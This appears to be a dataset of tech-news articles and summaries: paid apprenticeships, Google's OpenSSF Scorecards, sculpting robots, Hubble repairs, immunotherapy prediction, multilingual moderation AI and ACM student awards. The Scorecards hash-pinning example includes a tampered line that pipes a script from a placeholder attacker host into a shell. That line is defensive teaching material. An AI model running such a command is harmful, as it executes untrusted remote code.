IBM's have been promoted as having so much potential to address this issue that Congress's research arm recommended requiring employers to offer them, or to be taxed to pay for them. While being paid to train is hardly a new idea, it can be effective on multiple levels. Workers find more rewarding careers while employers enjoy a deeper talent pool, said Amy Kardel of CompTIA, an information technology trade association. People hired through the programs also tend to stay on the job longer; such programs can also broaden a company's culture by attracting employees, including workers of color, whose life experiences are outside the high school-to-college career arc common in white-collar workplaces. "Earn-and-learn strategies can open a door for someone into a career quickly," said Kardel, CompTIA's vice president for strategic workforce relationships. Just one in 300 American workers have participated in a formalized on-the-job training program, a rate less than one-tenth of that in much of western Europe . 
This despite increased attention here to the white-collar version of the kind of apprenticeship models that remain a staple of the unionized building trades. Still, being paid to train is becoming more common in the United States. The U.S. Department of Labor statistics shows a 70 percent increase in paid apprenticeships during the past decade . Aon, a London-based insurance giant, opened its U.S. earn-and-learn program in 2017, launching a 26-student class to its North American headquarters in Chicago. It has since joined with other Chicago businesses and community colleges to bring on more than 1,000 employee trainees around the city, and expanded its program to Aon offices around the country. Aon trainees join a career track - technology or finance, generally - while working with mentors on the job and taking community college classes. They're paid a full-time wage, taking on tasks previously done by recent university or college graduates. This shift to structured training also enables Aon to inject new diversity - in race, in gender and in life experience - into its business. Bridget Gainer, Aon's chief commercial officer, said the company is stronger for it. "Look, we're in the risk business," Gainer said. "Being able to determine risk takes all types of thought." When looking for talent, Aon recruiters had been turning to the Big Ten universities, Gainer said. Overlooked were institutions like the one Gainer sees from her office window: Harold Washington College, one of the City Colleges of Chicago. That's where Juawana Allen found Aon, by way of a flyer in the library advertising the Aon program. Allen had been working as a nanny and in retail while going to school full time. Her aim then was a law degree. A meeting with an Aon recruiter changed her course. "They were looking for people who were eager to learn and hungry for opportunity," said Allen, 23. "I'm extremely ambitious, and this lined up exactly with what I wanted to do." Joining the company's third trainee class, Allen was paid to split her hours between on-the-job training and classroom instruction provided at Harold Washington. The days were long - Allen and others regularly started work at 9 a.m. before heading to classes that wrapped up around 9 p.m. - but Allen made it through, graduating in December 2020. She now works in reinsurance in the company's Dallas office. Allen aspires to be one of the first women of color in a leadership role at Aon. If she succeeds, she will deliver on one of Gainer's hopes: to improve diversity in senior positions. The insurance industry, like most industries , is disproportionately white and male at the management level. "As a business community, we need to do a better job of diversifying our workforce, full stop," Gainer said. "If you don't address it at the entry level, you're abdicating your responsibility to actually make a change." Another set of employers - America's hospitals and clinics - have long relied on women and people of color to fill their ranks. They are chronically short on staff nonetheless. To address that shortfall in Washington, a training organization run by the state's largest hospitals and their biggest labor union provides a tuition assistance program that will pay the way for hospital employees to advance their educations in health-related fields. "We'll pay for their AA, their BA, their MBA, their PhD, the whole nine yards," said Laura Hopkins, executive director at SEIU Healthcare 1199NW Multi-Employer Training and Education Fund. 
"You don't have to have a dime in your pocket and you can get your education." Seven years ago, Eva Zhang was a waitress at a suburban Seattle sushi restaurant. Today, thanks to the training fund, she's being paid to become a nurse. Raised in Hubei, China, Zhang moved to the United States with her eldest son and then-husband when she was 24. She spent her first decade working in restaurants before deciding she wanted more growth and better benefits, especially for retirement. She enrolled at a small technical school just outside Seattle to become a medical assistant. The program was overwhelming - she was working full time and raising a family - but she graduated in 2015, at a cost of $10,000. Her starting wage - $16 an hour - hardly justified that investment. She was making less than she had at the sushi restaurant, where she continued to work on weekends. But the job qualified her for a no-cost education program run jointly by her employer and her union. Modeled on programs in New York State and elsewhere, the Washington initiative guides workers to courses of study at the University of Washington and other area institutions that suit their needs. Zhang, who reenrolled in college in the fall of 2019, plans to become a certified nursing assistant or licensed practical nurse, in-demand occupations that would increase her earnings and enable her to take on more complex, interesting work. "The more I know, the more I can contribute to the patients and coworkers at my job," Zhang said. "It's really a lot for people who have a family and have work to go back to school. It's not easy, but for me, I'm really grateful." Worker shortages are particularly acute in tech, where companies compete for workers who can take their skills anywhere. But technological proficiency isn't a priority only in Silicon Valley, said CompTIA's Kardel, whose employer is working with the U.S. Department of Labor to promote on-the-job learning. Employers who rely on technology - a group that includes most manufacturers, many retailers and the government - are chasing the same workers. "Tech is not only a vertical, it's horizontal," Kardel said. "These jobs are part of companies we all rely on every day." Ticking through the positions IBM looks to fill with trainees, Kelli Jordan, IBM's director of career and skills, borrowed a phrase coined five years ago by a former IBM CEO: " new-collar jobs ." The company is looking for employees who can take on white-collar work that doesn't, or shouldn't, require a four-year degree. The necessary learning happens on the job. IBM aims to hire more than 400 trainees each year, putting them on 25 different training tracks, from software development to data science to human resources, Jordan said. IBM retains about 90 percent of participants in the program, which has cost the company $65 million since 2018. Like many in its industry, IBM is advocating for the National Apprenticeship Act , which would inject $3.5 billion in federal support for Department of Labor-registered programs like these. The legislation passed the House of Representatives with broad support but has not come up for a vote in the Senate. As IBM measures it , the federal government puts forward $130 billion annually in grants, loans, and other benefits to undergraduate students pursuing bachelor's and other higher education degrees - spending that, in the company's view, no longer meets the needs of the digital economy. 
Programs that pay trainees to learn "are so critically important when we think about making good, well-paying jobs accessible to everybody," Jordan said. "And for companies, it's not something that is insurmountable." Haruza, the IBM trainee, is learning database management during the days. He's still chipping away at his bachelor's degree in the evenings - mostly to put off having to pay back his student loans. Haruza doesn't think the college degree will be particularly useful, and doesn't see why anyone would need one in a field that requires regular retraining anyway. "I hope education changes to something that's actually beneficial to people," Haruza said, "and can actually get them jobs." This story about paid training programs was produced by The Hechinger Report , a nonprofit, independent news organization focused on inequality and innovation in education. Sign up for the Hechinger newsletter .
146
Google Releases Open Source Security Software Program: Scorecards
Some naive people may still think they're not using open-source software. They're wrong. Everyone does. According to the Synopsys Cybersecurity Research Center (CyRC) 2021 "Open Source Security and Risk Analysis" (OSSRA) report, 95% of all commercial programs contain open-source software. By CyRC's count, the vast majority of that code is outdated or insecure. But how can you tell which libraries and other components are safe without doing a deep code dive? Google and the Open Source Security Foundation (OSSF) have a quick and easy answer: the OpenSSF Security Scorecards. These Scorecards are based on a set of automated pass/fail checks to provide a quick review of many open-source software projects. The Scorecards project is an automated security tool that produces a "risk score" for open-source programs. That's important because only some organizations have systems and processes in place to check new open-source dependencies for security problems. Even at Google, though, with all its resources, this process is often tedious, manual, and error-prone. Worse still, many of these projects and developers are resource-constrained. The result? Security often ends up a low priority on the task list. This leads to critical projects not following good security best practices and becoming vulnerable to exploits. With the release of Scorecards v2, the project hopes to make these security checks easier to run and security easier to achieve. The new version adds security checks, scales up the number of projects being scored, and makes the resulting data easily accessible for analysis. For developers, Scorecards help reduce the toil and manual effort required to continually evaluate changing packages when maintaining a project's supply chain. Consumers can automatically assess the risks and make informed decisions about accepting a program, looking for an alternative solution, or working with the maintainers to make improvements. Here's what's new: Identifying Risks: Since last fall, Scorecards' coverage has grown; the project has added several new checks, following Google's Know, Prevent, Fix framework. Spotting malicious contributors: Contributors with malicious intent or compromised accounts can introduce potential backdoors into code. Code reviews help mitigate such attacks. With the new Branch-Protection check, developers can verify that the project enforces mandatory code review from another developer before code is committed. Currently, this check can only be run by a repository admin due to GitHub API limitations. For a third-party repository, use the less informative Code-Review check instead. Vulnerable Code: Even with developers' and peer reviewers' best efforts, bad code can still enter a codebase and remain undetected. That's why it's important to enable continuous fuzzing and static code testing to catch bugs early in the development lifecycle. The project now checks to see if a project uses fuzzing and SAST tools as part of its continuous integration/continuous deployment (CI/CD) pipeline. Build system compromise: A common CI/CD solution used by GitHub projects is GitHub Actions. A danger with these action workflows is that they may handle untrusted user input, meaning an attacker can craft a malicious pull request to gain access to the privileged GitHub token, and with it the ability to push malicious code to the repo without review.
To mitigate this risk, Scorecards' Token-Permissions prevention check now verifies that the GitHub workflows follow the principle of least privilege by making GitHub tokens read-only by default. Bad dependencies: A program is only as secure as its weakest dependency. This may sound obvious, but the first step to knowing our dependencies is simply to declare them... and have your dependencies declare them too. Armed with this provenance information, you can assess the risks to your programs and mitigate those risks. That's the good news. The bad news is there are several widely used anti-patterns that break this provenance principle. The first of these anti-patterns is checked-in binaries -- as there's no way to easily verify or check the contents of a binary in the project. Thanks in particular to the continued use of proprietary drivers, this may be an unavoidable evil. Still, Scorecards provides a Binary-Artifacts check for testing this. Another anti-pattern is the use of curl or bash in scripts to dynamically pull dependencies. Cryptographic hashes let us pin our dependencies to a known value. If this value ever changes, the build system detects it and refuses to build. Pinning dependencies is useful everywhere we have dependencies: not just during compilation, but also in Dockerfiles, CI/CD workflows, etc. Scorecards checks for these anti-patterns with the Frozen-Deps check. This check is helpful for mitigating malicious dependency attacks such as the recent CodeCov attack.
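As a small illustration of the pinning idea (not of the Frozen-Deps check itself), the hypothetical Python snippet below records the SHA-256 digest of a reviewed artifact and refuses to proceed if the contents ever stop matching it; the artifact bytes and the "build" framing are placeholders invented for the example.

# Hypothetical illustration of hash-pinning: refuse to use an artifact whose
# contents no longer match the digest recorded at pin time.
import hashlib

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# At pin time, record the digest of the dependency that was reviewed.
trusted_artifact = b"#!/bin/sh\necho installing reviewed-tool v1.2.3\n"
PINNED_SHA256 = sha256_hex(trusted_artifact)

def verify(artifact: bytes) -> None:
    actual = sha256_hex(artifact)
    if actual != PINNED_SHA256:
        # Analogous to a build system detecting a changed value and refusing to build.
        raise RuntimeError(f"hash mismatch: expected {PINNED_SHA256}, got {actual}")

verify(trusted_artifact)  # passes: contents unchanged
try:
    verify(trusted_artifact + b"curl https://evil.example | sh\n")  # tampered contents
except RuntimeError as err:
    print("refusing to build:", err)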
Even with hash-pinning, hashes need to be updated once in a while when dependencies patch vulnerabilities. Tools like dependabot or renovatebot can review and update the hashes. The Scorecards Automated-Dependency-Update check verifies that developers rely on such tools to update their dependencies. It is also important to know the vulnerabilities in a project before using it as a dependency. Scorecards can provide this information via the new Vulnerabilities check, without subscribing to a vulnerability alert system. That's what's new. Here is what the Scorecards project has done so far. It has now evaluated security for over 50,000 open source projects. To scale this project, its architecture has been massively redesigned. It now uses a Pub/Sub model, which gives it improved horizontal scalability and higher throughput. This fully automated tool periodically evaluates critical open source projects and exposes the Scorecards check information through a weekly updated public BigQuery dataset. To access this data, you can use the bq command-line tool. The following example shows how to export data for the Kubernetes project. For your purposes, substitute the Kubernetes repo URL with the one for the program you need to check: $ bq query --nouse_legacy_sql 'SELECT Repo, Date, Checks FROM openssf.scorecardcron.scorecard_latest WHERE Repo="github.com/kubernetes/kubernetes"' You can also see the latest data on all Scorecards-analyzed projects. This data is also available in the new Google Open Source Insights project and the OpenSSF Security Metrics project. The raw data can also be examined via data analysis and visualization tools such as Google Data Studio. With the data in CSV format, you can examine it with whatever your favorite data analysis and visualization tool may be. One thing is clear from all this data: there are a lot of security gaps still to fill, even in widely used packages such as Kubernetes. For example, many projects are not continuously fuzzed, don't define a security policy for reporting vulnerabilities, and don't pin dependencies. According to Google, and frankly, anyone who cares about security: "We all need to come together as an industry to drive awareness of these widespread security risks, and to make improvements that will benefit everyone." As helpful as Scorecards v2 is, much more work remains to be done. The project now has 23 developers; more would be welcome. If you would like to join the fun, check out these good first-timer issues. These are all accessible via GitHub. If you would like us to help you run Scorecards on specific projects, please submit a GitHub pull request to add them. Last but not least, Google's developers said, "We have a lot of ideas and many more checks we'd like to add, but we want to hear from you. Tell us which checks you would like to see in the next version of Scorecards." Looking ahead, the team plans to add more checks. If I were you, I'd start using Scorecards immediately. This project can already make your work much safer, and it promises to do even more to improve not only the security of your programs but also that of the programs it covers.
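As a programmatic counterpart to the bq command shown earlier, the sketch below runs the same query with the google-cloud-bigquery Python client. It assumes the client library is installed and Google Cloud credentials are configured; the dataset and table names are simply carried over from the bq example above, and the fields printed per check are whatever the table exposes.

# Sketch: query the public Scorecards BigQuery dataset from Python instead of
# the bq CLI. Assumes `pip install google-cloud-bigquery` and configured
# Google Cloud credentials; the table name mirrors the bq example above.
from google.cloud import bigquery

client = bigquery.Client()

query = """
    SELECT Repo, Date, Checks
    FROM `openssf.scorecardcron.scorecard_latest`
    WHERE Repo = "github.com/kubernetes/kubernetes"
"""

for row in client.query(query).result():
    print(row["Repo"], row["Date"])
    for check in row["Checks"]:
        # Each check record carries the check's name and its result.
        print("  ", dict(check))

From there the rows can be dumped to CSV or a dataframe and explored in whatever analysis or visualization tool you prefer, as the article notes.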
Google and the Open Source Security Foundation have developed the OpenSSF Security Scorecards, an automated security tool that generates a "risk score" for open source programs. This is important because 95% of all commercial programs contain open source software, according to the Synopsys Cybersecurity Research Center, and many organizations lack the systems and processes to evaluate new open source dependencies for security issues. Scorecards v2 includes new security checks, including the Branch-Protection check, which ensures code reviews to prevent malicious contributors from introducing potential backdoors into code. The Scorecards project already has performed security evaluations for more than 50,000 open source projects.
[]
[]
[]
scitechnews
None
None
None
None
Google and the Open Source Security Foundation have developed the OpenSSF Security Scorecards, an automated security tool that generates a "risk score" for open source programs. This is important because 95% of all commercial programs contain open source software, according to the Synopsys Cybersecurity Research Center, and many organizations lack the systems and processes to evaluate new open source dependencies for security issues. Scorecards v2 includes new security checks, including the Branch-Protection check, which ensures code reviews to prevent malicious contributors from introducing potential backdoors into code. The Scorecards project already has performed security evaluations for more than 50,000 open source projects. Some naive people may still think they're not using open-source software. They're wrong. Everyone does. According to the Synopsys Cybersecurity Research Center (CyRC) 2021 "Open Source Security and Risk Analysis" (OSSRA) report , 95% of all commercial programs contain open-source software. By CyRC's count, the vast majority of that code contains outdated or insecure code. But how can you tell which libraries and other components are safe without doing a deep code dive? Google and the Open Source Security Foundation (OSSF) have a quick and easy answer: The OpenSSF Security Scorecards . These Scorecards are based on a set of automated pass/fail checks to provide a quick review of many open-source software projects. The Scorecards project is an automated security tool that produces a "risk score" for open-source programs. That's important because only some organizations have systems and processes in place to check new open-source dependencies for security problems. Even at Google, though, with all its resources, this process is often tedious, manual, and error-prone. Worse still, many of these projects and developers are resource-constrained. The result? Security often ends up a low priority on the task list. This leads to critical projects not following good security best practices and becoming vulnerable to exploits. The Scorecards project hopes to make security checks easier to make security easier to achieve with the release of Scorecards v2 . This includes new security checks, scaled up the number of projects being scored, and made this data easily accessible for analysis. For developers, Scorecards help reduce the toil and manual effort required to continually evaluate changing packages when maintaining a project's supply chain. Consumers can automatically access the risks to make informed decisions about accepting the program, look for an alternative solution, or work with the maintainers to make improvements. Here's what new: Identifying Risks: Since last fall, Scorecards' coverage has grown; the project has added several new checks, following Google's Know, Prevent, Fix framework . Spotting malicious contributors: Contributors with malicious intent or compromised accounts can introduce potential backdoors into code. Code reviews help mitigate such attacks. With the new Branch-Protection check, developers can verify that the project enforces mandatory code review from another developer before code is committed. Currently, this check can only be run by a repository admin due to GitHub API limitations. For a third-party repository, use the less informative Code-Review check instead. Vulnerable Code: Even with developers and peer review's best efforts, bad code can still enter a codebase and remain undetected. 
That's why it's important to enable continuous fuzzing and static code testing to catch bugs early in the development lifecycle. The project now checks to see if a project uses fuzzing and SAST tools as part of its continuous integration/continuous deployment (CI/CD) pipeline. Build system compromise: A common CI/CD solution used by GitHub projects is GitHub Actions. A danger with these action workflows is that they may handle untrusted user input, meaning an attacker can craft a malicious pull request to gain access to the privileged GitHub token, and with it the ability to push malicious code to the repo without review. To mitigate this risk, Scorecards' Token-Permissions prevention check now verifies that GitHub workflows follow the principle of least privilege by making GitHub tokens read-only by default. Bad dependencies: A program is only as secure as its weakest dependency. This may sound obvious, but the first step to knowing your dependencies is simply to declare them... and to have your dependencies declare theirs too. Armed with this provenance information, you can assess the risks to your programs and mitigate those risks. That's the good news. The bad news is that there are several widely used anti-patterns that break this provenance principle. The first of these anti-patterns is checked-in binaries, as there's no way to easily verify or check the contents of the binary in the project. Thanks in particular to the continued use of proprietary drivers, this may be an unavoidable evil. Still, Scorecards provides a Binary-Artifacts check for testing this. Another anti-pattern is the use of curl or bash in scripts, which dynamically pulls dependencies. Cryptographic hashes let us pin our dependencies to a known value. If this value ever changes, the build system detects it and refuses to build. Pinning dependencies is useful everywhere we have dependencies: not just during compilation, but also in Dockerfiles, CI/CD workflows, etc. Scorecards checks for these anti-patterns with the Frozen-Deps check. This check is helpful for mitigating malicious dependency attacks such as the recent Codecov attack. Even with hash-pinning, hashes need to be updated once in a while when dependencies patch vulnerabilities. Tools like dependabot or renovatebot can review and update the hashes. The Scorecards Automated-Dependency-Update check verifies that developers rely on such tools to update their dependencies. It is also important to know about vulnerabilities in a project before using it as a dependency. Scorecards can provide this information via the new Vulnerabilities check, without subscribing to a vulnerability alert system. That's what's new. Here is what the Scorecards project has done so far. It has now evaluated security for over 50,000 open source projects. To scale this project, its architecture has been massively redesigned. It now uses a Pub/Sub model, which gives it improved horizontal scalability and higher throughput. This fully automated tool periodically evaluates critical open source projects and exposes the Scorecards check information through a weekly updated public BigQuery dataset. To access this data, you can use the bq command-line tool. The following example shows how to export data for the Kubernetes project.
For your purposes, substitute the Kubernetes repo URL with the one for the program you need to check: $ bq query --nouse_legacy_sql 'SELECT Repo, Date, Checks FROM openssf.scorecardcron.scorecard_latest WHERE Repo="github.com/kubernetes/kubernetes"' You can also see the latest data on all Scorecards-analyzed projects. This data is also available in the new Google Open Source Insights project and the OpenSSF Security Metrics project. The raw data can also be examined via data analysis and visualization tools such as Google Data Studio, or exported in CSV format and examined with whatever your favorite data analysis and visualization tool may be. One thing is clear from all this data: there are a lot of security gaps still to fill, even in widely used packages such as Kubernetes. For example, many projects are not continuously fuzzed, don't define a security policy for reporting vulnerabilities, and don't pin dependencies. According to Google, and frankly, anyone who cares about security: "We all need to come together as an industry to drive awareness of these widespread security risks, and to make improvements that will benefit everyone." As helpful as Scorecards v2 is, much more work remains to be done. The project now has 23 developers; more would be welcome. If you would like to join the fun, check out the project's good first-timer issues, which are all accessible via GitHub. If you would like the Scorecards team to help you run Scorecards on specific projects, you can submit a GitHub pull request to add them. Last but not least, Google's developers said, "We have a lot of ideas and many more checks we'd like to add, but we want to hear from you. Tell us which checks you would like to see in the next version of Scorecards." Looking ahead, the team plans to add more checks along these lines. If I were you, I'd start using Scorecards immediately. This project can already make your work much safer, and it promises to do even more to improve security not only for your programs but also for the projects it covers.
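For readers who prefer working from a script rather than the bq command-line tool, the same public data can be queried with the Google Cloud BigQuery client library for Python. The sketch below is illustrative only: it assumes the openssf.scorecardcron.scorecard_latest table cited in the example above is still the current location of the weekly export, and that the environment is already authenticated to Google Cloud.

# Minimal sketch: query the public Scorecards BigQuery dataset from Python.
# Assumes `pip install google-cloud-bigquery` and an authenticated Google Cloud
# environment; the table name is taken from the bq example above and may change.
from google.cloud import bigquery

def fetch_scorecard(repo_url: str):
    client = bigquery.Client()
    query = """
        SELECT Repo, Date, Checks
        FROM `openssf.scorecardcron.scorecard_latest`
        WHERE Repo = @repo
    """
    job_config = bigquery.QueryJobConfig(
        query_parameters=[bigquery.ScalarQueryParameter("repo", "STRING", repo_url)]
    )
    rows = client.query(query, job_config=job_config).result()
    return [dict(row) for row in rows]

if __name__ == "__main__":
    # Same example project as above; substitute your own repository URL.
    for record in fetch_scorecard("github.com/kubernetes/kubernetes"):
        print(record["Repo"], record["Date"])
        for check in record["Checks"]:
            print("  ", check)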
147
'We Don't Need Another Michelangelo': In Italy, It's Robots' Turn to Sculpt
Scientists at the Robotor laboratory in Carrara, Italy, are developing sculpting robots to keep the country on the artistic forefront. Robotor's Giacomo Massari said the continued prosperity of the Italian marble sculpture segment depends on discarding traditional manual techniques, especially since marble has fallen out of favor in artistic circles. Robotor's Michele Basaldella said many outstanding sculptors lack distinction because manual dexterity is frowned upon, but robots can create groundbreaking works if they are built "with an artistic sensitivity." The company's founders initially used robots from local technology companies, but started designing their own from homemade software and German parts when artist clients started ordering increasingly challenging commissions.
[]
[]
[]
scitechnews
None
None
None
None
Scientists at the Robotor laboratory in Carrara, Italy, are developing sculpting robots to keep the country on the artistic forefront. Robotor's Giacomo Massari said the continued prosperity of the Italian marble sculpture segment depends on discarding traditional manual techniques, especially since marble has fallen out of favor in artistic circles. Robotor's Michele Basaldella said many outstanding sculptors lack distinction because manual dexterity is frowned upon, but robots can create groundbreaking works if they are built "with an artistic sensitivity." The company's founders initially used robots from local technology companies, but started designing their own from homemade software and German parts when artist clients started ordering increasingly challenging commissions.
148
NASA Preps 'More Complex and Riskier' Hubble Space Telescope Fix
The U.S. National Aeronautics and Space Administration (NASA) hopes to correct a persistent issue with the Hubble Space Telescope's payload computer, in which commands to write into or read from memory are not going through. The agency is preparing to activate backup hardware that is part of the Science Instrument Command and Data Handling unit where the payload computer resides. The NASA team is considering a power regulator element, and hardware that transmits and formats commands and data. An agency update said if one of these components is the likely culprit, it will require a more complicated and riskier backup unit-switching procedure than previously attempted. The switchover will be conducted in a simulation prior to the actual attempt, and the process highlights the reality of working with aging systems that have long exceeded operational expectations.
[]
[]
[]
scitechnews
None
None
None
None
The U.S. National Aeronautics and Space Administration (NASA) hopes to correct a persistent issue with the Hubble Space Telescope's payload computer, in which commands to write into or read from memory are not going through. The agency is preparing to activate backup hardware that is part of the Science Instrument Command and Data Handling unit where the payload computer resides. The NASA team is considering a power regulator element, and hardware that transmits and formats commands and data. An agency update said if one of these components is the likely culprit, it will require a more complicated and riskier backup unit-switching procedure than previously attempted. The switchover will be conducted in a simulation prior to the actual attempt, and the process highlights the reality of working with aging systems that have long exceeded operational expectations.
149
ML Helps Predict When Immunotherapy Will Be Effective
When it comes to defense, the body relies on attack thanks to the lymphatic and immune systems. The immune system is like the body's own personal police force as it hunts down and eliminates pathogenic villains. "The body's immune system is very good at identifying cells that are acting strangely. These include cells that could develop into tumors or cancer in the future," says Federica Eduati from the department of Biomedical Engineering at TU/e. "Once detected, the immune system strikes and kills the cells." But it's not always so straightforward as tumor cells can develop ways to hide themselves from the immune system. "Unfortunately, tumor cells can block the natural immune response. Proteins on the surface of a tumor cell can turn off the immune cells and effectively put them in sleep mode," says Oscar Lapuente-Santana, PhD researcher in the Computational Biology group . Fortunately, there is a way to wake up the immune cells and restore their antitumor immunity, and it's based on immunotherapy.
Researchers at the Eindhoven University of Technology (TU/e) in the Netherlands have developed a machine learning model that can predict whether immunotherapy will work for a patient. One type of immunotherapy that involves immune checkpoint blockers (ICB) is effective in only a third of patients. The researchers used computational algorithms and datasets from previous clinical patient care to search the tumor microenvironment for biomarkers to predict patient response to ICB. TU/e's Federica Eduati said, "RNA-sequencing datasets are publicly available, but the information about which patients responded to ICB therapy is only available for a small subset of patients and cancer types." To solve the data problem, the researchers searched for substitute immune responses from the same datasets, which could be an indicator of ICB's effectiveness. Eduati said, "Our machine learning model outperforms biomarkers currently used in clinical settings to assess ICB treatments."
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the Eindhoven University of Technology (TU/e) in the Netherlands have developed a machine learning model that can predict whether immunotherapy will work for a patient. One type of immunotherapy that involves immune checkpoint blockers (ICB) is effective in only a third of patients. The researchers used computational algorithms and datasets from previous clinical patient care to search the tumor microenvironment for biomarkers to predict patient response to ICB. TU/e's Federica Eduati said, "RNA-sequencing datasets are publicly available, but the information about which patients responded to ICB therapy is only available for a small subset of patients and cancer types." To solve the data problem, the researchers searched for substitute immune responses from the same datasets, which could be an indicator of ICB's effectiveness. Eduati said, "Our machine learning model outperforms biomarkers currently used in clinical settings to assess ICB treatments." When it comes to defense, the body relies on attack thanks to the lymphatic and immune systems. The immune system is like the body's own personal police force as it hunts down and eliminates pathogenic villains. "The body's immune system is very good at identifying cells that are acting strangely. These include cells that could develop into tumors or cancer in the future," says Federica Eduati from the department of Biomedical Engineering at TU/e. "Once detected, the immune system strikes and kills the cells." But it's not always so straightforward as tumor cells can develop ways to hide themselves from the immune system. "Unfortunately, tumor cells can block the natural immune response. Proteins on the surface of a tumor cell can turn off the immune cells and effectively put them in sleep mode," says Oscar Lapuente-Santana, PhD researcher in the Computational Biology group . Fortunately, there is a way to wake up the immune cells and restore their antitumor immunity, and it's based on immunotherapy.
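The TU/e model itself is not reproduced here, but the general workflow the article describes, learning to predict a surrogate of ICB response from tumor-microenvironment features derived from RNA-sequencing data, can be sketched with standard tools. The example below is a hypothetical illustration using synthetic data and scikit-learn, not the published method; the feature set and the surrogate label are stand-ins.

# Hypothetical sketch of the general approach: predict a surrogate immune-response
# label from RNA-seq-derived tumor-microenvironment features. Synthetic data only;
# this is NOT the TU/e model or its training procedure.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score

rng = np.random.default_rng(0)
n_patients, n_features = 300, 50          # e.g. immune-cell fractions, pathway scores
X = rng.normal(size=(n_patients, n_features))
# Surrogate response label loosely driven by a few "immune" features plus noise.
y = (X[:, :5].sum(axis=1) + rng.normal(scale=1.0, size=n_patients) > 0).astype(int)

model = RandomForestClassifier(n_estimators=200, random_state=0)
auc = cross_val_score(model, X, y, cv=5, scoring="roc_auc")
print(f"cross-validated AUC: {auc.mean():.2f} +/- {auc.std():.2f}")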
150
Meet the Scientist Teaching AI to Police Human Speech
Facebook and Google have engineered artificial intelligence (AI) systems capable of understanding dozens of languages with remarkable accuracy through the efforts of scientists like Alexis Conneau. At Facebook, Conneau and others advanced machine learning algorithms' ability to abstract language numerically, eventually training an AI model to piece through different languages concurrently; the 100-language XLM-R model was almost as accurate as its specialized single-language peers. Conneau's final work for Facebook was on wav2vec-U, an unsupervised speech-recognition system that reads words from audio. Conneau has helped lead research on natural language processing, and spearheaded work in AI that Facebook and others have applied to the online policing of bullying, bigotry, and hate speech. He believes this problem can be addressed only through automation, while critics claim such innovations will just give companies more information on Web users to exploit.
[]
[]
[]
scitechnews
None
None
None
None
Facebook and Google have engineered artificial intelligence (AI) systems capable of understanding dozens of languages with remarkable accuracy through the efforts of scientists like Alexis Conneau. At Facebook, Conneau and others advanced machine learning algorithms' ability to abstract language numerically, eventually training an AI model to piece through different languages concurrently; the 100-language XLM-R model was almost as accurate as its specialized single-language peers. Conneau's final work for Facebook was on wav2vec-U, an unsupervised speech-recognition system that reads words from audio. Conneau has helped lead research on natural language processing, and spearheaded work in AI that Facebook and others have applied to the online policing of bullying, bigotry, and hate speech. He believes this problem can be addressed only through automation, while critics claim such innovations will just give companies more information on Web users to exploit.
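The XLM-R model mentioned above was released publicly, so its multilingual behaviour can be examined directly. The snippet below is a small illustration using the Hugging Face transformers library and the base checkpoint: it fills a masked word in several languages with one shared model. It says nothing about Facebook's internal moderation systems, which are not public.

# Illustrative only: one multilingual masked-language model handling several
# languages. Uses the public xlm-roberta-base checkpoint via Hugging Face
# transformers; unrelated to any production content-moderation system.
from transformers import pipeline

fill = pipeline("fill-mask", model="xlm-roberta-base")

sentences = [
    "The capital of France is <mask>.",           # English
    "La capitale de la France est <mask>.",       # French
    "Die Hauptstadt von Frankreich ist <mask>.",  # German
]
for sentence in sentences:
    best = fill(sentence, top_k=1)[0]
    print(sentence, "->", best["token_str"], f"(score {best['score']:.2f})")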
151
2021 ACM Student Research Competition Winners Announced
New York, NY, July 8, 2021 - The winners of the 2021 Grand Finals of the Association for Computing Machinery (ACM) Student Research Competition (SRC) were recently announced, culminating a year-long competition in which 296 computer science students presented research projects at 21 ACM conferences. Jiaqi Gu, University of Texas at Austin; Konstantinos Kallas, University of Pennsylvania; and Guyue Huang, Tsinghua University took the top three places among graduate students. Thomas B. McHugh, Northwestern University; Chuangtao Chen, Zhejiang University; and Rakshit Mittal, Birla Institute of Technology & Science took the top three spots among undergraduates. Microsoft sponsors the SRC by providing travel grants of $500 to allow exemplary computing students to attend and present their research at major ACM computing conferences around the world. Through the Student Research Competition, each participating student has the unique opportunity to attend conference sessions, gain a new understanding of the practical applications of computer science scholarship, and share their own research with other students, conference attendees and eminent scientists and practitioners. For most students, the ACM Student Research Competition is their introduction to participating in premier computing research conferences. "Despite the impact of the COVID pandemic, the ACM Student Research Competition celebrated another successful year," said ACM President Gabriele Kotsis. "The SRC opens up the world of professional computing research to students. As the organizers of the competition, we are always heartened to read the testimonials students write after the competition ends. A common thread that runs through all the testimonials is that participation in the competition is a memory that will stay with them. We also offer SRC participants Student Membership to ACM, which gives these young people access to a range of essential resources for learning and career development and keeps them connected with the broader computing community. We thank our friends at Microsoft for their ongoing support of the SRC." "We congratulate the Graduate and Undergraduate winners, as well as all who participated in this year's SRC," said Evelyne Viegas, Senior Director of Global Research Engagement at Microsoft Research. "Computing has become interwoven into almost every aspect of life and business. New innovations, brought about by computing research, will play an important role in addressing the challenges we will face in the coming years. The ACM Student Research Competition prepares students for the future contributions they will make. As active participants in the global research community, SRC students are given access to the world's top computing conferences that empower them to engage in dialogue and share their ideas before experts and peers." Judges assess each presenter's demonstrated knowledge, the caliber of student contributions to the research and the overall quality of their oral and visual presentations. The most successful student researchers move through the competition's stages. In the first stages, their research posters and presentations are evaluated for content and presentation. During the Grand Finals, the students share a written 4,000-word description of their work before the final step of the competition, when an entirely new panel of judges evaluates each student's complete body of work and selects the overall winners. 
The 2021 Student Winners: Graduate Category - Jiaqi Gu (University of Texas at Austin), Konstantinos Kallas (University of Pennsylvania), and Guyue Huang (Tsinghua University); Undergraduate Category - Thomas B. McHugh (Northwestern University), Chuangtao Chen (Zhejiang University), and Rakshit Mittal (Birla Institute of Technology & Science). The ACM Student Research Competition (SRC), sponsored by Microsoft, offers a unique forum for undergraduate and graduate students to present their original research at well-known ACM-sponsored and co-sponsored conferences before a panel of judges and attendees. The SRC is a joint venture of ACM and Microsoft, which has provided generous funding of $120,000 per competition year for this event since 2003. The top three undergraduate and graduate winners at each SRC receive prizes of $500, $300, and $200 (USD), respectively, an award medal and a one-year complimentary ACM student membership with a subscription to ACM's Digital Library. ACM, the Association for Computing Machinery, is the world's largest educational and scientific computing society, uniting educators, researchers and professionals to inspire dialogue, share resources and address the field's challenges. ACM strengthens the computing profession's collective voice through strong leadership, promotion of the highest standards, and recognition of technical excellence. ACM supports the professional growth of its members by providing opportunities for life-long learning, career development, and professional networking.
